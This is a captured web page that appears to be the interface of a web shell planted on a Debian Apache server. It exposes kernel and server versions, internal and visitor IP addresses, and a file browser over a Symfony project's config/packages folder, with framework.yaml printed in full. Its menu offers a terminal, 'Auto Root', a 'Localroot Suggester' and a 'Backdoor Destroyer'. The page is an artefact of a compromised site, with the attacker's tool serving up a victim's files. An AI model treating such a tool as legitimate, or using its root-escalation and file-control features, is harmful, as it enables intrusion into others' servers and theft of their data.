Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
git /
cesa-v3 /
cesa-v3 /
config /
packages /
Delete
Unzip
Name
Size
Permission
Date
Action
test
[ DIR ]
drwxr-xr-x
2026-05-20 09:05
doctrine.yaml
6.66
KB
-rw-r--r--
2026-05-18 12:51
framework.yaml
1.02
KB
-rw-r--r--
2026-04-02 11:48
league_oauth2_server.yaml
533
B
-rw-r--r--
2025-07-04 14:25
monolog.yaml
2.83
KB
-rw-r--r--
2026-04-02 11:48
nelmio_cors.yaml
323
B
-rw-r--r--
2025-07-04 14:25
nyholm_psr7.yaml
627
B
-rw-r--r--
2025-07-04 14:25
security.yaml
3.33
KB
-rw-r--r--
2026-05-20 09:05
sonata_admin.yaml
293
B
-rw-r--r--
2025-07-04 14:25
sonata_block.yaml
17
B
-rw-r--r--
2026-05-18 12:51
twig.yaml
873
B
-rw-r--r--
2026-05-18 12:51
Save
Rename
# see https://symfony.com/doc/current/reference/configuration/framework.html framework: secret: '%env(APP_SECRET)%' csrf_protection: true http_method_override: false handle_all_throwables: true error_controller: App\CoreBundle\Controller\DefaultController::exceptionAction # Enables session support. Note that the session will ONLY be started if you read or write from it. # Remove or comment this section to explicitly disable session support. session: handler_id: 'session.handler.native_file' save_path: '%kernel.project_dir%/var/sessions/%kernel.environment%' cookie_secure: auto cookie_samesite: lax # storage_factory_id: session.storage.factory.native #esi: true #fragments: true php_errors: log: true when@test: framework: test: true session: storage_factory_id: session.storage.factory.mock_file when@prod: framework: error_controller: App\CoreBundle\Controller\DefaultController::exceptionAction